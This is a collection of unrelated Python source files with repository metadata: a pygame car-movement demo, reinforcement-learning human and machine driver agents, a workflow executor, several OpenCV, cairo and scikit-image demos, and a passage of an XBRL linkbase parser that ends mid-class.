        except ValidationError as err:
            raise HTTPError(error="Bad Request", status=HTTP_400, field_errors=err.messages)
| NomanGul/kanda-fullstack-test | server/middlewares/serializer.py | serializer.py | py | 1,084 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "utils.HTTPError.HTTPError",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "falcon.status_codes.HTTP_404",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mars... |
import pygame as pg

# Window dimensions and colour constants (RGB).
WIDTH = 700
HEIGHT = 500
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255,0)
BLUE = (0, 0, 255)

# Current held-state of the arrow keys.
up_key = False
down_key = False
left_key = False
right_key = False

# Car geometry and motion state.
CAR_WIDTH = 30
CAR_HEIGHT = 30
car_x = WIDTH / 2
car_y = HEIGHT / 2
car_x_vel = 0
car_y_vel = 0
max_vel = 10       # speed cap per axis
friction = 0.9     # velocity retained per frame when no input
power = 4          # acceleration per frame while a key is held

pg.init()
pg.display.set_caption('Platformer 1')
screen = pg.display.set_mode([WIDTH, HEIGHT])
running = True
while running == True:
    # Track key presses/releases so movement keys work while held down.
    for e in pg.event.get():
        if e.type == pg.QUIT:
            running = False
        elif e.type == pg.KEYDOWN:
            if e.key == pg.K_LEFT:
                left_key = True
            elif e.key == pg.K_RIGHT:
                right_key = True
            elif e.key == pg.K_DOWN:
                down_key = True
            elif e.key == pg.K_UP:
                up_key = True
        elif e.type == pg.KEYUP:
            if e.key == pg.K_LEFT:
                left_key = False
            elif e.key == pg.K_RIGHT:
                right_key = False
            elif e.key == pg.K_DOWN:
                down_key = False
            elif e.key == pg.K_UP:
                up_key = False
    # print(up_key, '\t', down_key, '\t', left_key, '\t', right_key)
    # After processing events:
    # Handle x velocity
    if left_key and not right_key:
        car_x_vel -= power
    elif not left_key and right_key:
        car_x_vel += power
    else:
        # No (or conflicting) input: friction bleeds off speed.
        car_x_vel = car_x_vel * friction
    # Limit x velocity
    if car_x_vel > max_vel:
        car_x_vel = max_vel
    elif car_x_vel < -max_vel:
        car_x_vel = -max_vel
    # Handle y velocity
    if up_key and not down_key:
        car_y_vel -= power
    elif not up_key and down_key:
        car_y_vel += power
    else:
        car_y_vel = car_y_vel * friction
    # Limit y velocity
    if car_y_vel > max_vel:
        car_y_vel = max_vel
    elif car_y_vel < -max_vel:
        car_y_vel = -max_vel
    # Change position by velocity
    car_x += car_x_vel
    car_y += car_y_vel
    # Warp car over x axis (re-enter on the opposite side once fully off-screen).
    # NOTE(review): the re-entry formulas are slightly asymmetric between the
    # two edges — looks approximate; confirm the intended wrap position.
    if car_x + (CAR_WIDTH/2) < 0:
        car_x = WIDTH - car_x
    elif car_x - (CAR_WIDTH/2) > WIDTH:
        car_x = car_x - WIDTH - CAR_WIDTH
    # Warp car over y axis
    if car_y + (CAR_HEIGHT/2) < 0:
        car_y = HEIGHT - car_y
    elif car_y - (CAR_HEIGHT/2) > HEIGHT:
        car_y = car_y - HEIGHT - CAR_HEIGHT
    # Render car (rect is drawn centred on car_x/car_y).
    screen.fill(WHITE)
    pg.draw.rect(screen, BLUE, (int(car_x-(CAR_WIDTH/2)), int(car_y-(CAR_HEIGHT/2)), CAR_WIDTH, CAR_HEIGHT))
    pg.display.update()
pg.quit()
| oscarsangwin/pygame-platformer | car01.py | car01.py | py | 2,614 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_caption",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "pygame.dis... |
17381398214 | """
Implementation of the human and machine policies in the paper
"""
from copy import copy
import random
import numpy as np
import math
import torch
from collections import defaultdict
from environments.env import Environment, GridWorld
from networks.networks import ActorNet
class Agent:
    """Base class for the human and machine agents.

    Subclasses override the no-op hooks below; the base class only provides
    an empty action-policy mapping.
    """

    def __init__(self):
        # Mapping from observations/states to actions; populated by subclasses.
        self.policy = {}

    def update_obs(self, *args):
        """Add observations to the record (no-op in the base class)."""

    def update_policy(self, *args):
        """Update the action policy (no-op in the base class)."""

    def take_action(self, *args):
        """Return an action based on the policy (no-op in the base class)."""
class MachineDriverAgent(Agent):
    # Actor-network-based machine driver trained with policy gradients.

    def __init__(self, n_state_features, n_actions, optimizer, setting=1, c_M=0., entropy_weight=0.01, batch_size=1):
        """Initialize network and hyperparameters"""
        super(MachineDriverAgent, self).__init__()
        # n_state_features[1] is the network input size
        self.network = ActorNet(n_state_features[1], n_actions)
        self.optimizer = optimizer(self.network.parameters())
        # Initial entropy-regularisation weight; annealed in update_policy.
        self.entropy_weight_0 = entropy_weight
        self.timestep = 0
        # c_M: cost incurred whenever the machine is in control.
        self.control_cost = c_M
        self.trainable = True
        self.M_t = np.zeros(batch_size)
        self.setting = setting
        # n_state_features[0] is the number of state features
        self.n_state_features = n_state_features[0]

    def update_obs(self, *args):
        """Return input batch for training"""
        pass

    def update_policy(self, weighting, delta, log_pi, entropy, use_entropy=True):
        """
        Implement train step
        Parameters
        ----------
        weighting: torch.LongTensor
            For off-policy weighting = M_t * rho_t, for on-policy weighting = switch(s)
        delta: torch.LongTensor
            For off-policy delta = TD_error, for on-policy delta = v(s)
        log_pi: torch.Tensor
            Log-probability of the taken action under the current policy
        entropy: torch.Tensor
            Entropy of the current action distribution (regulariser)
        use_entropy: bool
            When True, apply an entropy bonus annealed as 1/t
        """
        if use_entropy:
            # Anneal the entropy bonus so exploration fades over training.
            self.timestep+=1
            self.entropy_weight = self.entropy_weight_0/self.timestep
        else:
            self.entropy_weight = 0
        # weighting and delta must have been computed with torch.no_grad()
        policy_loss = weighting * delta * log_pi + self.entropy_weight*entropy
        policy_loss = policy_loss.mean()
        self.optimizer.zero_grad()
        policy_loss.backward()
        # Clip gradients to unit norm to stabilise the policy-gradient step.
        torch.nn.utils.clip_grad_norm_(self.network.parameters(), 1.)
        self.optimizer.step()

    def take_action(self, curr_state):
        """
        Return an action given the current based on the policy
        Parameters
        ----------
        curr_state: list of strings
            Current state vector
        Returns
        -------
        action: int
            The action to be taken
        policy: Categorical
            The action policy distribution given form the network
        """
        # TODO: make machine worse than human+machine e.g. same feature value for road-grass
        set_curr_state = curr_state
        if self.setting == 2 or self.setting == 6:
            # In settings 2/6 the machine cannot distinguish grass from road.
            set_curr_state = list(map(lambda x : 'road' if x=='grass' else x, curr_state ))
        state_feature_vector = Environment.state2features(set_curr_state, self.n_state_features)
        actions_logits = self.network(state_feature_vector)
        # actions_logits[actions_logits!=actions_logits] = 0
        valid_action_logits = actions_logits
        # print("logits", actions_logits)
        # # Never choose wall
        # if len(curr_state) > 1:
        #     if curr_state[1] == 'wall':
        #         valid_action_logits = actions_logits[1:]
        #     elif curr_state[3] == 'wall':
        #         valid_action_logits = actions_logits[:2]
        policy = torch.distributions.Categorical(logits=valid_action_logits)
        valid_action_probs = policy.probs
        # Clamp tiny probabilities for numerical stability, then renormalise.
        if (policy.probs < 1e-5).any():
            valid_action_probs = valid_action_probs.clamp(1e-5,1-1e-5)
            valid_action_probs = valid_action_probs/valid_action_probs.sum()
        if len(curr_state) > 1:
            # Mask out actions that would drive into a wall, renormalise, and
            # rebuild a 3-way distribution with zero mass on the wall action.
            if curr_state[1] == 'wall':
                valid_action_probs = valid_action_probs[1:].clamp(1e-5,1-1e-5)
                valid_action_probs = valid_action_probs/valid_action_probs.sum()
                valid_action_probs = torch.squeeze(torch.stack([torch.tensor(0),valid_action_probs[0], valid_action_probs[1]]))
            elif curr_state[3] == 'wall':
                valid_action_probs = valid_action_probs[:2].clamp(1e-5,1-1e-5)
                valid_action_probs = valid_action_probs/valid_action_probs.sum()
                valid_action_probs = torch.squeeze(torch.stack([valid_action_probs[0], valid_action_probs[1], torch.tensor(0)]))
        # valid_action_probs = valid_action_probs.clamp(1e-5, 1.)
        valid_policy = torch.distributions.Categorical(probs=valid_action_probs)
        # print("a", valid_action_probs)
        action = valid_policy.sample().item()
        if len(curr_state) > 1:
            # Sanity check: a masked (wall) action must never be sampled.
            if curr_state[1] == 'wall':
                assert action != 0
            elif curr_state[3] == 'wall':
                assert action != 2
        return action , valid_policy
# Module-level factory (instead of a lambda) so defaultdicts built from it
# remain picklable — needed to pickle the human agent.
def dd_init():
    """Return a fresh three-element zero list (per-action visit counts)."""
    return [0, 0, 0]
class NoisyDriverAgent(Agent):
    def __init__(self, env: Environment, prob_wrong: float, setting=1, noise_sw=.0, c_H=0., p_ignore_car=0.5):
        """
        A noisy driver, which chooses the cell with the lowest noisy estimated cost.
        Parameters
        ----------
        env: Environment
        prob_wrong : float
            Probability of picking action at random
        noise_sw : float
            Standard deviation of the Gaussian noise because of switching from Machine to Human
        c_H : float
            Cost of human control
        p_ignore_car : float
            Probability that the human treats a 'car' cell as plain road
        """
        super(NoisyDriverAgent, self).__init__()
        self.p_ignore_car = p_ignore_car
        self.prob_wrong = prob_wrong
        self.noise_sw = noise_sw
        # Walls are impassable, hence infinite cost.
        self.type_costs = { **env.type_costs, 'wall':np.inf}
        self.control_cost = c_H
        self.trainable = False
        self.setting = setting
        # When True, use the closed-form policy; otherwise the empirical counts.
        self.actual = True
        self.policy_approximation = defaultdict(dd_init)

    def update_policy(self, state, action, grid_id):
        """Update policy approximation, needed for the off policy stage"""
        # The human action in reality depends only on next row
        human_obs = tuple(state)
        self.policy_approximation[grid_id,human_obs][action]+=1

    def get_policy_approximation(self, state, action, grid_id):
        """ The approximated action policy distribution given the state """
        human_obs = tuple(state)
        total_state_visit = sum(self.policy_approximation[grid_id,human_obs])
        p_human_a_s = self.policy_approximation[grid_id,human_obs][action] / total_state_visit
        return p_human_a_s

    def get_actual_policy(self, state, next_state):
        # Closed-form probability that this noisy human moves into next_state[0].
        greedy_cell = min(state[1:4], key=lambda x: self.type_costs[x])
        next_cell = next_state[0]
        is_greedy = next_cell == greedy_cell
        # A wall removes one of the three candidate cells.
        n_cell = 2 if 'wall' in state[1:4] else 3
        n_opt = sum(1 for cell in state[1:4] if cell == greedy_cell)
        if self.setting == 1:
            if is_greedy:
                return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
            else:
                return self.prob_wrong/n_cell
        elif self.setting != 1:
            n_road = sum(1 for cell in state[1:4] if cell == 'road')
            n_car = sum(1 for cell in state[1:4] if cell == 'car')
            if is_greedy:
                if next_cell == 'road':
                    # Mixture over ignoring/not ignoring cars, plus uniform error mass.
                    mu_a_s = (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_road + self.p_ignore_car*(1 - self.prob_wrong)/(n_car + n_road) + self.prob_wrong/n_cell
                    return mu_a_s
                elif next_cell == 'car':
                    return 1/n_car
                else:
                    if 'car' in state[1:4]:
                        return (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
                    else:
                        return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
            else:
                if next_cell =='car':
                    # A non-greedy move into a car only happens when cars were ignored.
                    return self.p_ignore_car * (1 - self.prob_wrong)/(n_road +n_car) + self.prob_wrong/n_cell
                else:
                    return self.prob_wrong/n_cell

    def get_policy(self, state, action, grid_id, next_state):
        # Dispatch between the analytic policy and its empirical approximation.
        if self.actual:
            return self.get_actual_policy(state, next_state)
        else:
            return self.get_policy_approximation(state, action, grid_id)

    def take_action(self, curr_state, switch=False):
        '''
        current state in form of ['road', 'no-car','car','road','car', ...]
        human considers only next row, not the others
        '''
        # if end of episode is reached
        if len(curr_state) < 4:
            return random.randint(0,2)
        switch_noise = self.noise_sw if switch else 0.
        p_choose = random.random()
        p_ignore = random.random()
        curr_state_for_human = copy(curr_state)
        # ignore stone when switching
        if self.setting >= 4:
            for i, cell_type in enumerate(curr_state[1:4]):
                if cell_type == 'car' and switch:
                    curr_state_for_human[i+1] = 'road'
        # NOTE(review): nesting reconstructed — this block is treated as
        # independent of the `setting >= 4` block above, consistent with the
        # p_ignore_car terms in get_actual_policy; confirm against upstream.
        if self.setting!=6:
            for i, cell_type in enumerate(curr_state[1:4]):
                if cell_type == 'car' and p_ignore < self.p_ignore_car:
                    curr_state_for_human[i+1] = 'road'
        # noisy_next_cell_costs = [self.type_costs[nxt_cell_type] + random.gauss(0,estimation_noise) + random.gauss(0, switch_noise) if nxt_cell_type!='wall' else np.inf for nxt_cell_type, estimation_noise in zip(curr_state[2:5], estimation_noises)]
        noisy_next_cell_costs = [self.type_costs[nxt_cell_type] for nxt_cell_type in curr_state_for_human[1:4]]
        if p_choose < self.prob_wrong:
            # With probability prob_wrong pick uniformly among non-wall actions.
            if curr_state[1] == 'wall':
                action = random.choices(range(2), [1/2, 1/2])[0] + 1
            elif curr_state[3] == 'wall':
                action = random.choices(range(2), [1/2, 1/2])[0]
            else:
                action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
            return action
        min_estimated_cost = np.min(noisy_next_cell_costs)
        # ties are broken randomly
        possible_actions = np.argwhere(noisy_next_cell_costs == min_estimated_cost).flatten()
        n_possible_actions = possible_actions.size
        action = random.choices(possible_actions, [1/n_possible_actions]*n_possible_actions)[0]
        return action
class RandomDriverAgent(Agent):
    """A driver that picks one of the three actions uniformly at random."""

    def __init__(self):
        """A random driver """
        super().__init__()
        self.trainable = False
        self.control_cost = 0.0
        # Empirical action counts per observed state, used in the off-policy stage.
        self.policy_approximation = defaultdict(dd_init)

    def update_policy(self, state, action):
        """Update policy approximation, needed for the off policy stage"""
        # The human action in reality depends only on next row
        observation = tuple(state)
        self.policy_approximation[observation][action] += 1

    def get_policy_approximation(self, state, action):
        """ The approximated action policy distribution given the state """
        observation = tuple(state)
        counts = self.policy_approximation[observation]
        return counts[action] / sum(counts)

    def take_action(self, curr_state, switch=False):
        """Ignore the state and sample an action uniformly from {0, 1, 2}."""
        return random.choices(range(3), [1/3, 1/3, 1/3])[0]
class OptimalAgent():
    # Computes and follows the optimal finite-horizon policy for a GridWorld
    # via backward value iteration.

    def __init__(self, env: GridWorld, control_cost):
        self.env = env
        self.control_cost = control_cost
        # Deterministic transition tensor: p[x, y, a, nxt_x, nxt_y] = 1
        # exactly for the cell reached by taking action a in (x, y).
        self.p = np.zeros(shape=(self.env.width,self.env.height, 3, self.env.width,self.env.height))
        for y in range(self.env.height):
            for x in range(self.env.width):
                for a in range(3):
                    nxt_x,nxt_y = self.env.next_coords(x,y,a)
                    self.p[x,y,a,nxt_x,nxt_y] = 1.
        # Time-dependent optimal policy: policy[t][x][y] is a distribution over actions.
        self.policy = self.val_itr()

    def take_action(self, time, coords):
        # Sample an action from the optimal policy at this timestep and cell.
        x,y = coords
        return random.choices(range(3), self.policy[time][x][y])[0]

    def eval(self, n_try=1, plt_path=None):
        # Run n_try episodes under the optimal policy; return the mean trajectory cost.
        total_cost = []
        for i in range(n_try):
            self.env.reset()
            traj_cost = 0
            time = 0
            # NOTE(review): 'time' is never incremented in this loop, so every
            # step uses the t=0 policy slice — confirm whether this is intended.
            while True:
                cur_coords = self.env.current_coord
                action = self.take_action(time, cur_coords)
                _, cost, finished = self.env.step(action)
                if finished:
                    break
                traj_cost+=cost + self.control_cost
                if plt_path is not None:
                    plt_path.add_line(cur_coords, self.env.current_coord, 'red')
            total_cost.append(traj_cost)
        return np.mean(total_cost)

    def val_itr(self):
        # Finite-horizon value iteration; the horizon equals the grid height.
        ep_l = self.env.height
        n_ac = 3
        # q_val[time][state][action]
        q_val = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
        # q_min[time][state]
        q_min = np.zeros(shape=(ep_l + 1, self.env.width,self.env.height))
        # policy[time][state][action]
        policy = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
        for i in range(ep_l):
            # Backward induction from the final timestep to t = 0.
            t = ep_l - i - 1
            for y in range(self.env.height):
                for x in range(self.env.width):
                    for a in range(n_ac):
                        # Immediate cost of the entered cell plus expected cost-to-go.
                        nxt_x,nxt_y = self.env.next_coords(x,y,a)
                        q_val[t][x][y][a] = self.env.type_costs[self.env.cell_types[nxt_x,nxt_y]] + np.sum(self.p[x,y,a]* q_min[t + 1])
                    # Uniform distribution over all cost-minimising actions.
                    best_actions = np.where(q_val[t][x][y] == np.min(q_val[t][x][y]))[0]
                    policy[t][x,y][best_actions] = 1 / len(best_actions)
                    q_min[t][x][y] = np.min(q_val[t][x][y])
        return policy
{
"api_name": "networks.networks.ActorNet",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "torch.nn.utils.clip_grad_norm_",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": ... |
11424826236 | import logging
from edera.exceptions import ExcusableError
from edera.exceptions import ExcusableWorkflowExecutionError
from edera.exceptions import WorkflowExecutionError
from edera.queue import Queue
from edera.routine import deferrable
from edera.routine import routine
from edera.workflow.executor import WorkflowExecutor
class BasicWorkflowExecutor(WorkflowExecutor):
    """
    A basic workflow executor.
    Expects tasks to be ranked in advance.
    Runs tasks in the current thread one by one, handles exceptions, and performs logging.
    This executor is interruptible.
    See also:
        $TaskRanker
    """

    @routine
    def execute(self, workflow):
        # Drain the workflow's task queue sequentially; collect failures so the
        # whole workflow error is raised only after every task had its chance.
        queue = Queue(workflow)
        stopped_tasks = []
        failed_tasks = []
        while queue:
            task = queue.pick()
            # Phony tasks carry no work of their own; accept them immediately.
            if task.phony:
                queue.accept()
                continue
            try:
                logging.getLogger(__name__).debug("Picked task %r", task)
                if task.target is not None:
                    # Skip execution if the task's target is already satisfied.
                    completed = yield deferrable(task.target.check).defer()
                    if completed:
                        queue.accept()
                        continue
                logging.getLogger(__name__).info("Running task %r", task)
                yield deferrable(task.execute).defer()
            except ExcusableError as error:
                # Excusable failures are not hard errors: record and move on.
                logging.getLogger(__name__).info("Task %r stopped: %s", task, error)
                stopped_tasks.append(task)
                queue.discard()
            except Exception:
                logging.getLogger(__name__).exception("Task %r failed:", task)
                failed_tasks.append(task)
                queue.discard()
            else:
                logging.getLogger(__name__).info("Task %r completed", task)
                queue.accept()
        # Hard failures take precedence over excusable stops.
        if failed_tasks:
            raise WorkflowExecutionError(failed_tasks)
        if stopped_tasks:
            raise ExcusableWorkflowExecutionError(stopped_tasks)
| thoughteer/edera | edera/workflow/executors/basic.py | basic.py | py | 2,027 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "edera.workflow.executor.WorkflowExecutor",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "edera.queue.Queue",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 36,
"usage_type": "call"
},
{
"api_... |
# Demo: draw a red Bezier curve into an SVG file with pycairo.
import cairo

# creating a SVG surface
# here geek95 is file name & 700, 700 is dimension
with cairo.SVGSurface("geek95.svg", 700, 700) as surface:
    # creating a cairo context object for SVG surface
    # using Context method
    context = cairo.Context(surface)
    # move the context to x,y position
    context.move_to(50, 200)
    # Drawing Curve (cubic Bezier with two control points)
    context.curve_to(150, 75, 225, 50, 350, 150)
    # setting color of the context (red)
    context.set_source_rgb(1, 0, 0)
    # setting width of the context
    context.set_line_width(4)
    # stroke out the color and width property
    context.stroke()
# printing message when file is saved
print("File Saved")
import cv2
import numpy as np
def gammaCorrection(src, gamma):
    """Apply gamma correction to an 8-bit image.

    Builds a 256-entry lookup table mapping v -> 255 * (v/255)^(1/gamma)
    and applies it with cv2.LUT.

    Parameters
    ----------
    src : numpy.ndarray
        Input 8-bit (uint8) image.
    gamma : float
        Gamma value (> 0); values > 1 brighten, values < 1 darken.

    Returns
    -------
    numpy.ndarray
        Gamma-corrected image with the same shape and dtype as `src`.
    """
    invGamma = 1 / gamma
    # Vectorised LUT construction: one numpy expression replaces the
    # per-value Python list comprehension (same truncation-to-uint8 result).
    table = (((np.arange(256) / 255) ** invGamma) * 255).astype(np.uint8)
    return cv2.LUT(src, table)
# Apply gamma correction to a sample image and show before/after.
img = cv2.imread('image.jpg')
gammaImg = gammaCorrection(img, 2.2)
cv2.imshow('Original image', img)
cv2.imshow('Gamma corrected image', gammaImg)
cv2.waitKey(0)
cv2.destroyAllWindows()
# -----------------------------------------------------------------------------------------
# Demo: self-tuned Wiener deconvolution of a blurred, noisy image (scikit-image).
import numpy as np
import matplotlib.pyplot as plt
from skimage import color, data, restoration
rng = np.random.default_rng()
astro = color.rgb2gray(data.astronaut())
from scipy.signal import convolve2d as conv2
# Blur with a 5x5 box point-spread function, then add Gaussian noise.
psf = np.ones((5, 5)) / 25
astro = conv2(astro, psf, 'same')
astro += 0.1 * astro.std() * rng.standard_normal(astro.shape)
# Restore without knowing the noise level (parameters are self-tuned).
deconvolved, _ = restoration.unsupervised_wiener(astro, psf)
fig, ax = plt.subplots(nrows=1, ncols=2, figsize=(8, 5),
                       sharex=True, sharey=True)
plt.gray()
ax[0].imshow(astro, vmin=deconvolved.min(), vmax=deconvolved.max())
ax[0].axis('off')
ax[0].set_title('Data')
ax[1].imshow(deconvolved)
ax[1].axis('off')
ax[1].set_title('Self tuned restoration')
fig.tight_layout()
plt.show()
# ----------------------------------------------------------------------------------
# Demo: planar homography between two images (OpenCV).
import cv2
import numpy as np
# Read source image.
im_src = cv2.imread('image1.png')
# Four corners of the book in source image
pts_src = np.array([[141, 131], [480, 159], [493, 630], [64, 601]])
# Read destination image.
im_dst = cv2.imread('image.jpg')
# Four corners of the book in destination image.
pts_dst = np.array([[318, 256], [534, 372], [316, 670], [73, 473]])
# Calculate Homography
h, status = cv2.findHomography(pts_src, pts_dst)
# Warp source image to destination based on homography
im_out = cv2.warpPerspective(im_src, h, (im_dst.shape[1], im_dst.shape[0]))
# Display images
cv2.imshow("Source Image", im_src)
cv2.imshow("Destination Image", im_dst)
cv2.imshow("Warped Source Image", im_out)
cv2.waitKey(0)
#---------------------------------------------------------------------------
# Demo: applying an identity kernel with cv2.filter2D leaves the image unchanged.
import cv2
import numpy as np
image = cv2.imread('image.jpg')
#Apply identity kernel
kernel1 = np.array([[0, 0, 0],
                    [0, 1, 0],
                    [0, 0, 0]])
# filter2D() function can be used to apply kernel to an image.
# Where ddepth is the desired depth of final image. ddepth is -1 if...
# ... depth is same as original or source image.
identity = cv2.filter2D(src=image, ddepth=-1, kernel=kernel1)
# We should get the same image
cv2.imshow('Original', image)
cv2.imshow('Identity', identity)
cv2.waitKey()
cv2.imwrite('identity.jpg', identity)
cv2.destroyAllWindows()
# ------------------------------------------------------------
# Demo: 5x5 box-blur kernel applied via cv2.filter2D.
import cv2
import numpy as np
image = cv2.imread('image.jpg')
#Apply blurring kernel
kernel2 = np.ones((5, 5), np.float32) / 25
img = cv2.filter2D(src=image, ddepth=-1, kernel=kernel2)
cv2.imshow('Original', image)
cv2.imshow('Kernel Blur', img)
cv2.waitKey()
cv2.imwrite('blur_kernel.jpg', img)
cv2.destroyAllWindows()
| Malgetany/ch2-part2 | main.py | main.py | py | 3,947 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cairo.SVGSurface",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cairo.Context",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_numb... |
17523274197 | #!/usr/bin/env python
"""
author: Jun Ding
date: 2020-07-06
function: plot the expression of input gene
copy and modification of this code is allowed for academic purposes.
Please don NOT remove this author statement under any condition.
"""
import sys,os,pdb,argparse
import anndata
import scanpy as sc
def plotGene(exFn, gene):
    """Plot the UMAP embedding colored by the expression of *gene*.

    exFn: path to the h5ad prerun result; gene: gene ID as it appears in
    the expression file's var index.
    """
    prerun_result = anndata.read_h5ad(exFn)
    if gene not in prerun_result.var.index:
        # Guard clause: unknown gene, explain the two likely causes and bail out.
        print("Error! please check your input gene ID, it must be the same as in your expression file")
        print("Also, the missing gene could be caused by the dispersion based gene filtering by the prerun program")
        return
    sc.pl.umap(prerun_result, color=[gene])
def main():
    """Parse the command-line arguments and plot the requested gene."""
    arg_parser = argparse.ArgumentParser(description="scdiff2 plotGene")
    arg_parser.add_argument('-i', '--input', required=True, help='input h5ad prerun result')
    arg_parser.add_argument('-g', '--gene', required=True, help='gene name you want to explore, must be the same ID as in your original input expression file')
    parsed = arg_parser.parse_args()
    plotGene(parsed.input, parsed.gene)
# Script entry point: delegate to main() for argument parsing and plotting.
if __name__=="__main__":
    main()
| phoenixding/scdiff2 | utils/plotGene.py | plotGene.py | py | 1,080 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "anndata.read_h5ad",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "scanpy.pl.umap",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "scanpy.pl",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentPars... |
4500680225 | import abc
import os
import xml.etree.ElementTree as ET
from abc import ABC
from enum import Enum
from typing import List
from xbrl import XbrlParseException, LinkbaseNotFoundException
from xbrl.cache import HttpCache
from xbrl.helper.uri_helper import resolve_uri
LINK_NS: str = "{http://www.xbrl.org/2003/linkbase}"
XLINK_NS: str = "{http://www.w3.org/1999/xlink}"
XBRLDT_NS: str = "{http://xbrl.org/2005/xbrldt}"
XML_NS: str = "{http://www.w3.org/XML/1998/namespace}"
class LinkbaseType(Enum):
    """ Enum of linkbase types, that this parser can parse """
    DEFINITION = 0x001
    CALCULATION = 0x002
    PRESENTATION = 0x003
    LABEL = 0x004

    @staticmethod
    def get_type_from_role(role: str) -> "LinkbaseType | None":
        """
        Takes a xlink:role (i.e http://www.xbrl.org/2003/role/definitionLinkbaseRef) and returns the corresponding
        LinkbaseType.
        Note: the mapping dict stays inside the method on purpose — a dict
        assigned in an Enum class body would itself become an enum member.
        @param role: the xlink:role URI
        @return: LinkbaseType or None if the role is unknown
        """
        # Fixed: return annotation previously read `int or None`, which
        # evaluates to plain `int`; the method returns a LinkbaseType.
        return {
            'http://www.xbrl.org/2003/role/definitionLinkbaseRef': LinkbaseType.DEFINITION,
            'http://www.xbrl.org/2003/role/calculationLinkbaseRef': LinkbaseType.CALCULATION,
            'http://www.xbrl.org/2003/role/presentationLinkbaseRef': LinkbaseType.PRESENTATION,
            'http://www.xbrl.org/2003/role/labelLinkbaseRef': LinkbaseType.LABEL,
        }.get(role, None)

    @staticmethod
    def guess_linkbase_role(href: str) -> "LinkbaseType | None":
        """
        Guesses the linkbase type from conventional substrings ('_def',
        '_cal', '_pre', '_lab') in the linkbase file name.
        @param href: file name / href of the linkbase
        @return: LinkbaseType or None if no marker substring is present
        """
        return LinkbaseType.DEFINITION if '_def' in href \
            else LinkbaseType.CALCULATION if '_cal' in href \
            else LinkbaseType.PRESENTATION if '_pre' in href \
            else LinkbaseType.LABEL if '_lab' in href \
            else None
class AbstractArcElement(ABC):
    """
    Represents an abstract Arc.
    An Arc links two Locators together and assigns a relationship between those two items.
    Arcs are used in all linkbases (definition, calculation, presentation and label).
    From the Xbrl Specification 2.0:
        Standard Arc Element:
        An element derived from xl:arc that is defined in this specification. Specifically,
        one of: link:presentationArc, link:calculationArc, link:labelArc, link:referenceArc, or link:definitionArc.
    i.e:
    <link:definitionArc order="30"
        xlink:arcrole="http://xbrl.org/int/dim/arcrole/domain-member"
        xlink:from="loc_AssetsAbstract"
        xlink:to="loc_CashAndCashEquivalentsAtCarryingValue" xlink:type="arc"/>
    This arc describes the relationship between Assets and Cash and Cash Equivalents. Cash is a sub-domain from Assets.
    """

    def __init__(self, from_locator, arcrole: str, order: int) -> None:
        """
        @param from_locator: Locator object the arc is pointing from.
            A to_locator is deliberately absent here, because not all arcs point
            to another locator: a label arc, for example, points to multiple link:label's.
        @type from_locator: Locator
        @param arcrole: Role of the arc
        @param order: Order attribute of the arc. Only makes sense in combination with the arc role.
            i.e. arcrole parent-child together with the order attribute defines a hierarchical
            relationship between elements (XBRL for Interactive Data, 2009, p.59)
        """
        self.from_locator = from_locator
        self.arcrole: str = arcrole
        self.order: int = order

    @abc.abstractmethod
    def to_dict(self):
        """ Returns a dictionary representation of the arc """
        pass
class RelationArc(AbstractArcElement, ABC):
    """
    A Relation arc is an abstract implementation of an AbstractArcElement that has the to_locator attribute.
    Unlike a label arc, a relation arc always points at exactly one target locator.
    """

    def __init__(self, from_locator, to_locator, arcrole: str, order: int) -> None:
        super().__init__(from_locator, arcrole, order)
        self.to_locator: Locator = to_locator
class DefinitionArc(RelationArc):
    """A link:definitionArc connecting two locators of a definition linkbase."""

    def __init__(self, from_locator, to_locator, arcrole: str, order: int, closed: bool = None,
                 context_element: str = None) -> None:
        """
        @type from_locator: Locator
        @type to_locator: Locator
        @param arcrole: one of the dimensional arcroles
            (XBRL for Interactive Data, 2009, p.140):
            - http://xbrl.org/int/dim/arcrole/all: connects a measure to a
              hypercube implying use of its dimensions and their breakdowns
              (elements: closed, contextElement, targetRole)
            - http://xbrl.org/int/dim/arcrole/notAll: connects a measure to a
              hypercube prohibiting use of its dimensions and their breakdowns
              (elements: closed, contextElement, targetRole)
            - http://xbrl.org/int/dim/arcrole/hypercube-dimension: connects a
              hypercube and a dimension item (elements: targetRole)
            - http://xbrl.org/int/dim/arcrole/dimension-domain: connects a
              dimension item to its top level members (elements: usage, targetRole)
            - http://xbrl.org/int/dim/arcrole/domain-member: hierarchical
              relations for measures and domain members; for measures implies
              inheritance of dimensional characteristics from upper-level
              concepts (elements: usage, targetRole)
            - http://xbrl.org/int/dim/arcrole/dimension-default: links a
              dimension item to its default member (no elements)
        @param closed: value of the xbrldt:closed attribute, if present
        @param context_element: value of xbrldt:contextElement (segment/scenario)
        """
        super().__init__(from_locator, to_locator, arcrole, order)
